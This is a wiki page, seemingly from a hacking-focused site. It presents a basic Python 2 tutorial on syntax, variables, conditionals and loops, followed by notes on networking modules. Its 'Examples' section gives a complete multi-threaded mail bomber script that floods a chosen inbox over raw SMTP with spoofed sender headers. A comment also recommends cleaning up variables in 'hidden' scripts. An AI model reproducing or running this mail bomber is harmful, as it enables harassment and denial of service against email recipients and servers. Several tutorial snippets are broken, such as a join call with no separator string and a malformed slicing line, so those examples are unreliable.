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Below applies to Python 2.6 or lower, Python 3 is a good bit different.
Below applies to Python 2.6 or lower, Python 3 is a good bit different.


Python is an object oriented, interpreted language. It is unique in that it requires a user to indent in place of using curly brackets ({). It is used (along with php and vb) for many tools, since it is easy to use and has many features.  
Python is an object oriented, interpreted language. It is unique in that it requires a user to indent in place of using curly brackets ({..}).


Note: that most *nix distrobutions come with python by default.
Note: that most *nix distributions come with Python by default.


==Basics==
==Basics==
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===Tornado Web===
===Tornado Web===
[http://www.tornadoweb.org/ Tornado] is an open source version of the scalable, non-blocking web server and tools that power FriendFeed. The FriendFeed application is written using a web framework that looks a bit like web.py or Google's webapp, but with additional tools and optimizations to take advantage of the underlying non-blocking infrastructure.
[http://www.tornadoweb.org/ Tornado] is an open source version of the scalable, non-blocking web server and tools that power FriendFeed. The FriendFeed application is written using a web framework that looks a bit like web.py or Google's webapp, but with additional tools and optimizations to take advantage of the underlying non-blocking infrastructure.
==Links==
[http://docs.python.org/ Python Documentation]
[http://www.python.org/download/ Download Python]


[[Category:Programming]]
[[Category:Programming]]

Latest revision as of 19:56, 14 August 2010

Below applies to Python 2.6 or lower, Python 3 is a good bit different.

Python is an object oriented, interpreted language. It is unique in that it requires a user to indent in place of using curly brackets ({..}).

Note: that most *nix distributions come with Python by default.

Basics[edit]

Basic python syntax

Hello World![edit]

>>> print "HELLO WORLD!"
HELLO WORLD!

Variables[edit]

Variable names DO NOT need to begin with a special character, unlike PHP. Variable names CAN, however, be any combination, as long as the word isn't reserved (Ex: and, or, print), of letters and numbers.


>>> #Numbers
>>> a = 1 #Declare A as 1
>>> b = a+5 #b becomes 6, while a remains 1
>>> a += 5 #a is overwritten, and becomes 6
>>> c = b = a #c and b are overwritten and become 6
>>> #Strings
>>> a = "Hello "
>>> b = "There"
>>> c = a+b #JOIN STRINGS
>>> a = "Blue Yellow Green Red".split(" ") #Split the string at every " "
>>> a #Output 'a' to the screen, same as print or print()
['Blue', 'Yellow', 'Green', 'Red'] #List object, another type of variable
>>> .join(a) #Join all the list objects as one
'BlueYellowGreenRed'
>>> a = 'Blue Green Yellow Red'[0:4] #This returns the sub-string 'Blue'
>>> a = 'Blue Green Yellow Red'[5:] #This returns the sub-string 'Green Yellow Red'
>>> a = 'a = 'Blue Green Yellow Red'[::2] #This returns the sub-string Bu re elwRd'
>>> #Float 
>>> a = 88.2
>>> b = 88
>>> print a/25
3.528
>>> print b/25
3
>>> #Other types
>>> a = (" ", 355, 256.7, ["Hello", "World"])
>>> type(a)
<type 'tuple'>
>>> a = {"Hello":"World", "Key":"Value"}
>>> type(a)
<type 'dict'>
>>> a = "Anhero"
>>> del a #Its a good idea, if you're making a 'hidden' script, to delete variables after you use them...

Statements[edit]

Comparison[edit]

 <       Less than
 >       Greater than
 ==      Equal to
 !=      Not equal
 is      Identical
 is not  Not identical
 <=      Less than or equal to
 >=      Greater than or equal to

If[edit]

>>> a = 1
>>> b = 2
>>> if a != b:
	print "No!"
 
 	
No!
>>> a = 1
>>> b = 1
>>> if a == b:
	print "Yes!"

	
Yes!
>>> a = 1
>>> b = 5
>>> if (a == b-len("....")/1) and "a" == "a" or "b" == "b":
	print "Yes!"

 	
Yes!

Loops[edit]

While[edit]

>>> a = 1
>>> while a < 5: #Note, replacing '<' with '<=' allows it to reach 5, instead of stopping at 4
	print a
	a += 1;


1
2
3
4
>>> a = False;
>>> while a == False:
	print "False"
	a = True;

	
False

For[edit]

>>> for x in range(0, 10):
	print x

	
0
1
2
3
4
5
6
7
8
9

consider using xrange when dealing with larger lists, as it creates an iterator, rather than constructing the full list in memory

>>> for x in ['Hello', 'world', ',this', 'is', 'a', 'list']:
	print x

	
Hello
world
,this
is
a
list

Examples[edit]

Multi-Threaded Mail Bomber[edit]

#CREATED BY: DUMP 
#MULTI THREADING ALLOWS FOR A CLASS TO BE RUN MULTIPLE TIMES AT ONCE.
#INCLUDES SMTP ENGINE, AND MAIL HEADER GEN. THAT FOLLOWS RFC STARDARDS
import socket, datetime, time, threading;
class MailGen():
    def Engine(self, To, From, Subject, Data):
        self.lf = "\r\n";
        return "From: \""+From.split("@")[0]+"\" <"+From+">"+self.lf+"Return-Path: "+From+self.lf+"Sender: "+From+self.lf+"Recieved: "+From.split("@") [1].capitalize()+":25"+self.lf+"To: \""+To.split("@")[0]+"\" <"+To+">"+self.lf+"Subject: "+Subject+self.lf+"Date:  "+datetime.datetime.now().strftime("%a, %d %d %Y %H:%S")+self.lf+self.lf+Data
class MailBomb(threading.Thread):
    def __init__(self, To, From, Data):
        self.To = To;
        self.From = From;
        self.Data = Data;
        threading.Thread.__init__ ( self )
    def run(self):
        print "THREAD LAUNCHED";
        self.lf = "\r\n";
        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
        self.connection.connect((self.To[self.To.index("@")+1:len(self.To)], 25));
        self.connection.send("HELO"+self.lf); self.connection.recv(1024);
        self.connection.send("MAIL FROM: "+self.From+self.lf); self.connection.recv(1024);
        self.connection.send("RCPT TO: "+self.To+self.lf); self.connection.recv(1024);
        self.connection.send("DATA"+self.lf); self.connection.recv(1024);
        for line in self.Data: self.connection.send(line);
        self.connection.send(self.lf+self.lf+"."+self.lf); self.connection.recv(1024);
        self.connection.send("QUIT"+self.lf); self.connection.close();
address1 = raw_input("To E-mail: ");
address2 = raw_input("From E-mail: ");
data1 = raw_input("Subject: ");
data2 = raw_input("Data: ");
generator = MailGen();
message = generator.Engine(address1, address2, data1, data2);
multiply = int(raw_input("Amount Sent (0, 5, 10...): "));
lists = [address1]*multiply;
for a in range(0, multiply, 5):
    for b in range(a, a+5):
        MailBomb(lists[b], address2, message).start();
    time.sleep(.50);

Modules[edit]

Scapy[edit]

Scapy is a powerful, low-level, networking tool

DPKT[edit]

fast, simple packet creation / parsing, with definitions for the basic TCP/IP protocols.

Twisted[edit]

Twisted is an event-driven networking engine written in Python and licensed under the MIT license.

Tornado Web[edit]

Tornado is an open source version of the scalable, non-blocking web server and tools that power FriendFeed. The FriendFeed application is written using a web framework that looks a bit like web.py or Google's webapp, but with additional tools and optimizations to take advantage of the underlying non-blocking infrastructure.

Links[edit]

Python Documentation Download Python